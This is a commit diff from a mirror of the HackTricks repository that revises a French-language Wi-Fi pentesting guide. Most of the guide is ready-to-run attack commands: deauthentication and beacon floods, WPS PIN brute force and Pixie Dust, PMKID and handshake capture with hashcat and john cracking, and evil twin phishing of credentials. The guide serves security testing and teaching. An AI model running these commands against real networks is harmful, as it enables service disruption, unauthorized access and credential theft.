Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['generic-methodologies-and-resources/pentesting-wifi/README.

Browse source
This commit is contained in:
Translator 2024-03-26 19:23:35 +00:00
parent cc39a10fa7
commit 8c45525649
2 changed files with 73 additions and 65 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

131
generic-methodologies-and-resources/pentesting-wifi/README.md
View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
@ -16,7 +16,7 @@ Autres façons de soutenir HackTricks :
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des pirates expérimentés et des chasseurs de primes !
Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des pirates expérimentés et des chasseurs de primes en bugs !
**Perspectives de piratage**\
Engagez-vous avec du contenu qui explore le frisson et les défis du piratage
@ -38,9 +38,11 @@ airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis
```
## Outils
@ -51,7 +53,7 @@ git clone https://github.com/s0lst1c3/eaphammer.git
```
### Airgeddon
Airgeddon est un outil tout-en-un pour les tests de sécurité sans fil sur les réseaux Wi-Fi. Il combine de nombreuses attaques puissantes dans un seul outil, ce qui en fait un choix populaire parmi les testeurs de pénétration.
Airgeddon est un outil tout-en-un pour les tests de sécurité sans fil sur les réseaux Wi-Fi. Il combine de nombreuses attaques puissantes dans un seul framework, ce qui en fait un choix populaire parmi les pentesteurs et les chercheurs en sécurité.
```bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
@ -72,7 +74,7 @@ v1s1t0r1sh3r3/airgeddon
```
### wifiphisher
Il peut effectuer des attaques Evil Twin, KARMA et Known Beacons, puis utiliser un modèle de phishing pour parvenir à obtenir le mot de passe réel du réseau ou capturer les identifiants des réseaux sociaux.
Il peut effectuer des attaques Evil Twin, KARMA et Known Beacons, puis utiliser un modèle de phishing pour parvenir à obtenir le vrai mot de passe du réseau ou capturer les identifiants des réseaux sociaux.
```bash
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
@ -83,7 +85,7 @@ sudo python setup.py install # Install any dependencies
Cet outil automatise les attaques **WPS/WEP/WPA-PSK**. Il effectuera automatiquement :
* Mettre l'interface en mode monitor
* Scanner les réseaux possibles - Et vous permettre de sélectionner la victime(s)
* Scanner les réseaux possibles - Et vous permet de sélectionner la victime(s)
* Si WEP - Lancer des attaques WEP
* Si WPA-PSK
* Si WPS : Attaque Pixie dust et attaque par force brute (soyez prudent, l'attaque par force brute pourrait prendre beaucoup de temps). Notez qu'il n'essaie pas les PIN nuls ou les PIN générés par base de données.
@ -95,18 +97,18 @@ Cet outil automatise les attaques **WPS/WEP/WPA-PSK**. Il effectuera automatique
* **DoS**
* Paquets de déauthentification/désassociation -- Déconnecter tout le monde (ou un ESSID/Client spécifique)
* Faux AP aléatoires -- Cacher les réseaux, possible crash des scanners
* Faux AP aléatoires -- Cacher les réseaux, possible de crasher les scanners
* Surcharge de l'AP -- Essayer de tuer l'AP (généralement pas très utile)
* WIDS -- Jouer avec l'IDS
* TKIP, EAPOL -- Quelques attaques spécifiques pour DoS certains APs
* **Cracking**
* Cracker **WEP** (plusieurs outils et méthodes)
* **WPA-PSK**
* **PIN WPS** "Brute-Force"
* **Bruteforce** PMKID **WPA**
* \[DoS +] Capture de **handshake WPA** + Cracking
* **WPS** pin "Brute-Force"
* **WPA PMKID** bruteforce
* \[DoS +] Capture de **WPA handshake** + Cracking
* **WPA-MGT**
* Capture de **nom d'utilisateur**
* Capture de **Nom d'utilisateur**
* **Bruteforce** des identifiants
* **Jumeau maléfique** (avec ou sans DoS)
* **Jumeau maléfique** **Ouvert** \[+ DoS] -- Utile pour capturer les identifiants du portail captif et/ou effectuer des attaques LAN
@ -120,9 +122,9 @@ Cet outil automatise les attaques **WPS/WEP/WPA-PSK**. Il effectuera automatique
### Paquets de Déauthentification
**Description de** [**ici**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
**Description de** [**ici**:](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
Les attaques de **déauthentification**, une méthode courante en piratage Wi-Fi, consistent à forger des trames "de gestion" pour **déconnecter de force les appareils d'un réseau**. Ces paquets non chiffrés trompent les clients en leur faisant croire qu'ils proviennent du réseau légitime, permettant aux attaquants de collecter des handshakes WPA à des fins de craquage ou de perturber de manière persistante les connexions réseau. Cette tactique, alarmante par sa simplicité, est largement utilisée et a des implications significatives pour la sécurité des réseaux.
Les attaques de **déauthentification**, une méthode courante dans le piratage Wi-Fi, consistent à forger des trames "de gestion" pour **déconnecter de force les appareils d'un réseau**. Ces paquets non chiffrés trompent les clients en leur faisant croire qu'ils proviennent du réseau légitime, permettant aux attaquants de collecter des handshakes WPA à des fins de craquage ou de perturber de manière persistante les connexions réseau. Cette tactique, alarmante par sa simplicité, est largement utilisée et a des implications significatives pour la sécurité des réseaux.
**Déauthentification en utilisant Aireplay-ng**
```
@ -149,11 +151,11 @@ mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
```
### **Plus d'attaques DOS par mdk4**
**Dans** [**ici**](https://en.kali.tools/?p=864)**.**
**Dans** [**ce lien**](https://en.kali.tools/?p=864)**.**
**MODE D'ATTAQUE b: Inondation de balises**
**MODE D'ATTAQUE b : Inondation de balises**
Envoie des trames de balises pour afficher de faux AP aux clients. Cela peut parfois faire planter les scanners réseau et même les pilotes!
Envoie des trames de balises pour afficher de faux AP aux clients. Cela peut parfois faire planter les scanners réseau et même les pilotes !
```bash
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
@ -163,7 +165,7 @@ mdk4 wlan0mon b -a -w nta -m
```
**MODE D'ATTAQUE a: Déni de service d'authentification**
L'envoi de trames d'authentification à tous les Points d'Accès (APs) accessibles dans la portée peut surcharger ces APs, en particulier lorsque de nombreux clients sont impliqués. Ce trafic intense peut entraîner une instabilité du système, provoquant le gel ou même la réinitialisation de certains APs.
L'envoi de trames d'authentification à tous les Points d'Accès (APs) accessibles dans la portée peut surcharger ces APs, surtout lorsque de nombreux clients sont impliqués. Ce trafic intense peut entraîner une instabilité du système, provoquant le gel ou même la réinitialisation de certains APs.
```bash
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
@ -173,11 +175,11 @@ mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
```
**MODE D'ATTAQUE p: Exploration et Bruteforcing des SSID**
L'exploration des points d'accès (AP) vérifie si un SSID est correctement révélé et confirme la portée de l'AP. Cette technique, associée au **bruteforcing des SSID cachés** avec ou sans liste de mots, aide à identifier et accéder aux réseaux dissimulés.
L'exploration des Points d'Accès (AP) vérifie si un SSID est correctement révélé et confirme la portée de l'AP. Cette technique, associée au **bruteforcing des SSID cachés** avec ou sans liste de mots, aide à identifier et accéder aux réseaux dissimulés.
**MODE D'ATTAQUE m: Exploitation des Contremesures Michael**
**MODE D'ATTAQUE m: Exploitation des Contremesures de Michael**
L'envoi de paquets aléatoires ou dupliqués à différentes files QoS peut déclencher les Contremesures Michael sur les AP **TKIP**, entraînant un arrêt d'un minute de l'AP. Cette méthode est une tactique d'attaque **DoS** (Déni de Service) efficace.
L'envoi de paquets aléatoires ou dupliqués à différentes files QoS peut déclencher les Contremesures de Michael sur les AP **TKIP**, entraînant un arrêt d'une minute de l'AP. Cette méthode est une tactique d'attaque **DoS** (Déni de Service) efficace.
```bash
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
@ -222,14 +224,14 @@ Il existe 2 principaux outils pour effectuer cette action : Reaver et Bully.
* **Reaver** a été conçu pour être une attaque robuste et pratique contre WPS, et a été testé contre une grande variété de points d'accès et d'implémentations WPS.
* **Bully** est une **nouvelle implémentation** de l'attaque par force brute WPS, écrite en C. Il présente plusieurs avantages par rapport au code reaver original : moins de dépendances, amélioration des performances mémoire et CPU, gestion correcte de l'endianness et un ensemble d'options plus robuste.
L'attaque exploite la **vulnérabilité du PIN WPS**, en particulier son exposition des quatre premiers chiffres et le rôle du dernier chiffre en tant que checksum, facilitant l'attaque par force brute. Cependant, les défenses contre les attaques par force brute, comme **le blocage des adresses MAC** des attaquants agressifs, exigent une **rotation des adresses MAC** pour continuer l'attaque.
L'attaque exploite la **vulnérabilité du PIN WPS**, en particulier son exposition des quatre premiers chiffres et le rôle du dernier chiffre en tant que checksum, facilitant l'attaque par force brute. Cependant, les défenses contre les attaques par force brute, comme le **blocage des adresses MAC** des attaquants agressifs, exigent une **rotation des adresses MAC** pour poursuivre l'attaque.
Après avoir obtenu le PIN WPS avec des outils comme Bully ou Reaver, l'attaquant peut déduire la PSK WPA/WPA2, assurant un **accès réseau persistant**.
Après avoir obtenu le PIN WPS avec des outils comme Bully ou Reaver, l'attaquant peut déduire le PSK WPA/WPA2, assurant un **accès réseau persistant**.
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
```
**Smart Brute Force**
**Brute Force Intelligent**
Cette approche affinée cible les PIN WPS en utilisant des vulnérabilités connues :
@ -238,13 +240,18 @@ Cette approche affinée cible les PIN WPS en utilisant des vulnérabilités conn
### Attaque WPS Pixie Dust
**Dominique Bongard** a découvert une faille dans certains Points d'Accès (AP) concernant la création de codes secrets, connus sous le nom de **nonces** (**E-S1** et **E-S2**). Si ces nonces peuvent être découverts, le craquage du PIN WPS de l'AP devient facile. L'AP révèle le PIN dans un code spécial (hash) pour prouver qu'il est légitime et non un AP faux (rogue). Ces nonces sont essentiellement les "clés" pour déverrouiller le "coffre-fort" qui contient le PIN WPS. Plus d'informations à ce sujet peuvent être trouvées [ici](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)).
**Dominique Bongard** a découvert une faille dans certains Points d'Accès (AP) concernant la création de codes secrets, appelés **nonces** (**E-S1** et **E-S2**). Si ces nonces peuvent être découverts, le craquage du PIN WPS de l'AP devient facile. L'AP révèle le PIN dans un code spécial (hash) pour prouver qu'il est légitime et non un AP faux (rogue). Ces nonces sont essentiellement les "clés" pour déverrouiller le "coffre-fort" qui contient le PIN WPS. Plus d'informations à ce sujet peuvent être trouvées [ici](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)).
En termes simples, le problème est que certains AP n'utilisaient pas des clés assez aléatoires pour chiffrer le PIN lors du processus de connexion. Cela rend le PIN vulnérable à être deviné depuis l'extérieur du réseau (attaque de force brute hors ligne).
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
```
Si vous ne voulez pas passer l'appareil en mode monitor, ou si `reaver` et `bully` posent problème, vous pouvez essayer [OneShot-C](https://github.com/nikita-yfh/OneShot-C).
Cet outil peut effectuer une attaque Pixie Dust sans avoir à passer en mode monitor.
```bash
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
```
### Attaque de code PIN nul
Certains systèmes mal conçus permettent même à un **code PIN nul** (un code PIN vide ou inexistant) d'accorder l'accès, ce qui est assez inhabituel. L'outil **Reaver** est capable de tester cette vulnérabilité, contrairement à **Bully**.
@ -260,7 +267,7 @@ Toutes les attaques WPS proposées peuvent être facilement effectuées en utili
* 5 et 6 vous permettent d'essayer **votre PIN personnalisé** (si vous en avez un)
* 7 et 8 effectuent l'attaque **Pixie Dust**
* 13 vous permet de tester le **PIN NULL**
* 11 et 12 vont **récupérer les PIN liés à l'AP sélectionné à partir des bases de données disponibles** et **générer** des **PIN** possibles en utilisant : ComputePIN, EasyBox et éventuellement Arcadyan (recommandé, pourquoi pas ?)
* 11 et 12 vont **récupérer les PINs liés à l'AP sélectionné à partir des bases de données disponibles** et **générer** des **PINs** possibles en utilisant : ComputePIN, EasyBox et éventuellement Arcadyan (recommandé, pourquoi pas ?)
* 9 et 10 vont tester **chaque PIN possible**
## **WEP**
@ -276,8 +283,8 @@ Tellement obsolète et inutilisé de nos jours. Sachez simplement que _**airgedd
Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des hackers expérimentés et des chasseurs de bugs !
**Perspectives de Hacking**\
Impliquez-vous dans du contenu qui explore le frisson et les défis du hacking
**Perspectives sur le Hacking**\
Engagez-vous avec du contenu qui explore le frisson et les défis du hacking
**Actualités de Hacking en Temps Réel**\
Restez à jour avec le monde du hacking en évolution rapide grâce aux actualités et aux informations en temps réel
@ -285,7 +292,7 @@ Restez à jour avec le monde du hacking en évolution rapide grâce aux actualit
**Dernières Annonces**\
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
**Rejoignez-nous sur** [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
Rejoignez-nous sur [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
***
@ -302,9 +309,9 @@ Comme l'article original l'explique, le **PMKID** est créé en utilisant des do
```bash
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
```
Étant donné que le "Nom PMK" est constant, nous connaissons le BSSID du point d'accès et de la station, et le `PMK` est identique à celui d'une poignée de main complète en 4 étapes, **hashcat** peut utiliser ces informations pour craquer le PSK et récupérer la phrase secrète!
Étant donné que le "Nom PMK" est constant, nous connaissons le BSSID de l'AP et de la station, et le `PMK` est identique à celui d'une poignée de main complète en 4 étapes, **hashcat** peut utiliser ces informations pour craquer le PSK et récupérer la phrase secrète!
Pour **collecter** ces informations et **effectuer une attaque par force brute** localement sur le mot de passe, vous pouvez faire:
Pour **collecter** ces informations et **effectuer une attaque par force brute** localement sur le mot de passe, vous pouvez faire :
```bash
airmon-ng check kill
airmon-ng start wlan0
@ -316,15 +323,15 @@ hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
```
Les **PMKIDs capturés** seront affichés dans la **console** et également **enregistrés** dans \_ **/tmp/attack.pcap**\_\
Maintenant, convertissez la capture au format **hashcat/john** et cassez-le :
Les **PMKIDs capturés** seront affichés dans la **console** et également **enregistrés** dans \_/tmp/attack.pcap\_\
Maintenant, convertissez la capture au format **hashcat/john** et crackez-la:
```bash
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
Veuillez noter que le format correct d'un hachage contient **4 parties**, comme ceci : `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838`
Si le vôtre ne contient **que 3 parties**, alors il est **invalide** (la capture PMKID n'était pas valide).
Si le vôtre ne contient **que** **3 parties**, alors il est **invalide** (la capture PMKID n'était pas valide).
Notez que `hcxdumptool` **capture également les poignées de main** (quelque chose comme ceci apparaîtra : **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). Vous pouvez **transformer** les **poignées de main** au format **hashcat**/**john** en utilisant `cap2hccapx`
```bash
@ -334,7 +341,7 @@ hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
```
_J'ai remarqué que certaines poignées de main capturées avec cet outil n'ont pas pu être craquées même en connaissant le mot de passe correct. Je recommanderais de capturer les poignées de main également de manière traditionnelle si possible, ou d'en capturer plusieurs en utilisant cet outil._
_J'ai remarqué que certaines poignées de main capturées avec cet outil ne pouvaient pas être craquées même en connaissant le mot de passe correct. Je recommanderais de capturer les poignées de main également de manière traditionnelle si possible, ou d'en capturer plusieurs en utilisant cet outil._
### Capture de poignée de main
@ -345,13 +352,13 @@ Une attaque sur les réseaux **WPA/WPA2** peut être exécutée en capturant une
```bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
```
3. Pour augmenter les chances de capturer une poignée de main, déconnectez momentanément le client du réseau pour forcer une ré-authentification. Cela peut être fait en utilisant la commande `aireplay-ng`, qui envoie des paquets de déconnexion au client:
3. Pour augmenter les chances de capturer une poignée de main, déconnectez momentanément le client du réseau pour forcer une nouvelle authentification. Cela peut être fait en utilisant la commande `aireplay-ng`, qui envoie des paquets de déauthentification au client :
```bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
```
_Notez que lorsque le client a été désauthentifié, il pourrait essayer de se connecter à un autre point d'accès ou, dans d'autres cas, à un réseau différent._
_Notez que lorsque le client a été désauthentifié, il pourrait essayer de se connecter à un autre AP ou, dans d'autres cas, à un réseau différent._
Une fois que le `airodump-ng` affiche des informations de poignée de main, cela signifie que la poignée de main a été capturée et vous pouvez arrêter d'écouter :
Une fois que les informations de poignée de main apparaissent dans `airodump-ng`, cela signifie que la poignée de main a été capturée et vous pouvez arrêter d'écouter :
![](<../../.gitbook/assets/image (172) (1).png>)
@ -387,7 +394,7 @@ Dans **les configurations WiFi d'entreprise, vous rencontrerez diverses méthode
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
```
1. **EAP-GTC (Generic Token Card)**:
- Cette méthode prend en charge les jetons matériels et les mots de passe à usage unique dans EAP-PEAP. Contrairement à MSCHAPv2, elle n'utilise pas de défi pair et envoie les mots de passe en texte clair à l'accès point, posant un risque d'attaques de rétrogradation.
- Cette méthode prend en charge les jetons matériels et les mots de passe à usage unique dans EAP-PEAP. Contrairement à MSCHAPv2, elle n'utilise pas de défi pair et envoie les mots de passe en texte clair à l'accès point, ce qui pose un risque d'attaques de rétrogradation.
2. **EAP-MD5 (Message Digest 5)**:
- Implique l'envoi du hachage MD5 du mot de passe depuis le client. Il **n'est pas recommandé** en raison de la vulnérabilité aux attaques par dictionnaire, du manque d'authentification du serveur et de l'incapacité à générer des clés WEP spécifiques à la session.
@ -401,7 +408,7 @@ Dans **les configurations WiFi d'entreprise, vous rencontrerez diverses méthode
5. **PEAP (Protected Extensible Authentication Protocol)**:
- Fonctionne de manière similaire à EAP en créant un tunnel TLS pour une communication protégée. Il permet l'utilisation de protocoles d'authentification plus faibles sur EAP en raison de la protection offerte par le tunnel.
* **PEAP-MSCHAPv2**: Souvent appelé PEAP, il combine le mécanisme de défi/réponse MSCHAPv2 vulnérable avec un tunnel TLS protecteur.
* **PEAP-EAP-TLS (ou PEAP-TLS)**: Similaire à EAP-TLS mais initie un tunnel TLS avant d'échanger des certificats, offrant une couche de sécurité supplémentaire.
* **PEAP-EAP-TLS (ou PEAP-TLS)**: Similaire à EAP-TLS mais initie un tunnel TLS avant l'échange de certificats, offrant une couche de sécurité supplémentaire.
Vous pouvez trouver plus d'informations sur ces méthodes d'authentification [ici](https://en.wikipedia.org/wiki/Extensible\_Authentication\_Protocol) et [ici](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html).
@ -416,7 +423,7 @@ Dans le paquet "**Réponse, Identité**", le **nom d'utilisateur** du client app
### Identités anonymes
La dissimulation de l'identité est prise en charge à la fois par EAP-PEAP et EAP-TTLS. Dans le contexte d'un réseau WiFi, une demande d'identité EAP est généralement initiée par le point d'accès (AP) lors du processus d'association. Pour garantir la protection de l'anonymat de l'utilisateur, la réponse du client EAP sur l'appareil de l'utilisateur ne contient que les informations essentielles requises pour que le serveur RADIUS initial puisse traiter la demande. Ce concept est illustré à travers les scénarios suivants :
La dissimulation de l'identité est prise en charge à la fois par EAP-PEAP et EAP-TTLS. Dans le contexte d'un réseau WiFi, une demande d'identité EAP est généralement initiée par le point d'accès (AP) lors du processus d'association. Pour garantir la protection de l'anonymat de l'utilisateur, la réponse du client EAP sur l'appareil de l'utilisateur ne contient que les informations essentielles nécessaires pour que le serveur RADIUS initial traite la demande. Ce concept est illustré à travers les scénarios suivants :
* EAP-Identité = anonyme
@ -424,15 +431,15 @@ La dissimulation de l'identité est prise en charge à la fois par EAP-PEAP et E
* EAP-Identité = anonyme@realm_x
- Dans cette situation, les utilisateurs de différents domaines dissimulent leurs identités tout en indiquant leurs domaines respectifs. Cela permet au serveur RADIUS initial de transmettre les demandes EAP-PEAP ou EAP-TTLS aux serveurs RADIUS dans leurs domaines d'origine, qui agissent en tant que serveur PEAP ou TTLS. Le serveur RADIUS initial fonctionne uniquement comme un nœud relais RADIUS.
- Dans cette situation, les utilisateurs de différents domaines dissimulent leurs identités tout en indiquant leurs domaines respectifs. Cela permet au serveur RADIUS initial de transmettre les demandes EAP-PEAP ou EAP-TTLS aux serveurs RADIUS dans leurs domaines d'origine, qui agissent en tant que serveur PEAP ou TTLS. Le serveur RADIUS initial agit uniquement en tant que nœud relais RADIUS.
- Alternativement, le serveur RADIUS initial peut fonctionner comme le serveur EAP-PEAP ou EAP-TTLS et gérer la méthode d'authentification protégée ou la transférer à un autre serveur. Cette option facilite la configuration de politiques distinctes pour différents domaines.
- Alternativement, le serveur RADIUS initial peut fonctionner en tant que serveur EAP-PEAP ou EAP-TTLS et gérer la méthode d'authentification protégée ou la transférer à un autre serveur. Cette option facilite la configuration de politiques distinctes pour différents domaines.
En EAP-PEAP, une fois que le tunnel TLS est établi entre le serveur PEAP et le client PEAP, le serveur PEAP initie une demande d'identité EAP et la transmet à travers le tunnel TLS. Le client répond à cette deuxième demande d'identité EAP en envoyant une réponse d'identité EAP contenant la véritable identité de l'utilisateur à travers le tunnel chiffré. Cette approche empêche efficacement la divulgation de l'identité réelle de l'utilisateur à toute personne qui écoute le trafic 802.11.
En EAP-PEAP, une fois que le tunnel TLS est établi entre le serveur PEAP et le client PEAP, le serveur PEAP initie une demande d'identité EAP et la transmet à travers le tunnel TLS. Le client répond à cette deuxième demande d'identité EAP en envoyant une réponse d'identité EAP contenant la véritable identité de l'utilisateur à travers le tunnel chiffré. Cette approche empêche efficacement la révélation de l'identité réelle de l'utilisateur à toute personne qui écoute le trafic 802.11.
EAP-TTLS suit une procédure légèrement différente. Avec EAP-TTLS, le client s'authentifie généralement en utilisant PAP ou CHAP, sécurisé par le tunnel TLS. Dans ce cas, le client inclut un attribut Nom d'utilisateur et soit un attribut Mot de passe, soit un attribut CHAP-Mot de passe dans le message TLS initial envoyé après l'établissement du tunnel.
Peu importe le protocole choisi, le serveur PEAP/TTLS obtient connaissance de la véritable identité de l'utilisateur une fois que le tunnel TLS a été établi. La véritable identité peut être représentée sous la forme utilisateur@domaine ou simplement utilisateur. Si le serveur PEAP/TTLS est également responsable de l'authentification de l'utilisateur, il possède désormais l'identité de l'utilisateur et procède à la méthode d'authentification protégée par le tunnel TLS. Alternativement, le serveur PEAP/TTLS peut transmettre une nouvelle demande RADIUS au serveur RADIUS d'origine de l'utilisateur. Cette nouvelle demande RADIUS exclut la couche de protocole PEAP ou TTLS. Dans les cas où la méthode d'authentification protégée est EAP, les messages EAP internes sont transmis au serveur RADIUS d'origine sans l'enveloppe EAP-PEAP ou EAP-TTLS. L'attribut Nom d'utilisateur du message RADIUS sortant contient la véritable identité de l'utilisateur, remplaçant le Nom d'utilisateur anonyme de la demande RADIUS entrante. Lorsque la méthode d'authentification protégée est PAP ou CHAP (prise en charge uniquement par TTLS), les attributs Nom d'utilisateur et autres attributs d'authentification extraits de la charge utile TLS sont substitués dans le message RADIUS sortant, remplaçant le Nom d'utilisateur anonyme et les attributs EAP-Message TTLS trouvés dans la demande RADIUS entrante.
Peu importe le protocole choisi, le serveur PEAP/TTLS obtient connaissance de la véritable identité de l'utilisateur une fois que le tunnel TLS a été établi. La véritable identité peut être représentée sous la forme utilisateur@domaine ou simplement utilisateur. Si le serveur PEAP/TTLS est également responsable de l'authentification de l'utilisateur, il possède désormais l'identité de l'utilisateur et procède à la méthode d'authentification protégée par le tunnel TLS. Alternativement, le serveur PEAP/TTLS peut transmettre une nouvelle demande RADIUS au serveur RADIUS d'origine de l'utilisateur. Cette nouvelle demande RADIUS exclut la couche de protocole PEAP ou TTLS. Dans les cas où la méthode d'authentification protégée est EAP, les messages EAP internes sont transmis au serveur RADIUS d'origine sans l'enveloppe EAP-PEAP ou EAP-TTLS. L'attribut Nom d'utilisateur du message RADIUS sortant contient la véritable identité de l'utilisateur, remplaçant le Nom d'utilisateur anonyme du message RADIUS entrant. Lorsque la méthode d'authentification protégée est PAP ou CHAP (prise en charge uniquement par TTLS), les attributs Nom d'utilisateur et autres attributs d'authentification extraits de la charge utile TLS sont substitués dans le message RADIUS sortant, remplaçant le Nom d'utilisateur anonyme et les attributs EAP-Message TTLS trouvés dans la demande RADIUS entrante.
Pour plus d'informations, consultez [https://www.interlinknetworks.com/app\_notes/eap-peap.htm](https://www.interlinknetworks.com/app\_notes/eap-peap.htm)
@ -557,17 +564,17 @@ Vous pouvez également créer un Twin Maléfique en utilisant **eaphammer** (rem
```bash
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
```
Ou en utilisant Airgeddon : `Options : 5,6,7,8,9 (à l'intérieur du menu de l'attaque Evil Twin).`
Ou en utilisant Airgeddon : `Options : 5,6,7,8,9 (à l'intérieur du menu d'attaque Evil Twin).`
![](<../../.gitbook/assets/image (148).png>)
Veuillez noter qu'en cas de sauvegarde par défaut d'un ESSID dans la PNL comme protégé par WPA, le périphérique ne se connectera pas automatiquement à un faux point d'accès Open. Vous pouvez essayer de faire une attaque de déni de service sur le vrai AP et espérer que l'utilisateur se connectera manuellement à votre faux point d'accès Open, ou vous pourriez faire une attaque de déni de service sur le vrai AP et utiliser un WPA Evil Twin pour capturer le handshake (en utilisant cette méthode, vous ne pourrez pas laisser la victime se connecter à vous car vous ne connaissez pas la PSK, mais vous pouvez capturer le handshake et essayer de le craquer).
Veuillez noter qu'en cas de protection WPA par défaut d'un ESSID dans la PNL, le périphérique ne se connectera pas automatiquement à un faux point d'accès ouvert. Vous pouvez essayer de faire une attaque de déni de service sur le vrai AP et espérer que l'utilisateur se connectera manuellement à votre faux point d'accès ouvert, ou vous pourriez faire une attaque de déni de service sur le vrai AP et utiliser un faux point d'accès WPA pour capturer le handshake (en utilisant cette méthode, vous ne pourrez pas laisser la victime se connecter à vous car vous ne connaissez pas la PSK, mais vous pouvez capturer le handshake et essayer de le craquer).
_Certains systèmes d'exploitation et antivirus avertiront l'utilisateur que se connecter à un réseau ouvert est dangereux..._
### WPA/WPA2 Evil Twin
### Faux point d'accès WPA/WPA2
Vous pouvez créer un **Faux point d'accès en utilisant WPA/2** et si les appareils sont configurés pour se connecter à cet SSID avec WPA/2, ils vont essayer de se connecter. Cependant, **pour compléter le 4-way-handshake**, vous devez également **connaître** le **mot de passe** que le client va utiliser. Si vous ne le **connaissez pas**, la **connexion ne sera pas complétée**.
Vous pouvez créer un **Faux point d'accès en utilisant WPA/2** et si les appareils sont configurés pour se connecter à cet SSID avec WPA/2, ils vont essayer de se connecter. Cependant, **pour compléter le handshake en 4 étapes**, vous devez également **connaître** le **mot de passe** que le client va utiliser. Si vous ne le **connaissez pas**, la **connexion ne sera pas complétée**.
```bash
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
```
@ -577,12 +584,12 @@ Pour comprendre ces attaques, je recommanderais de lire d'abord la brève [expli
**Utilisation de hostapd-wpe**
`hostapd-wpe` a besoin d'un fichier de **configuration** pour fonctionner. Pour **automatiser** la génération de ces configurations, vous pouvez utiliser [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (téléchargez le fichier python à l'intérieur de _/etc/hostapd-wpe/_).
`hostapd-wpe` a besoin d'un fichier de **configuration** pour fonctionner. Pour **automatiser** la génération de ces configurations, vous pourriez utiliser [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (téléchargez le fichier python à l'intérieur de _/etc/hostapd-wpe/_).
```bash
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
```
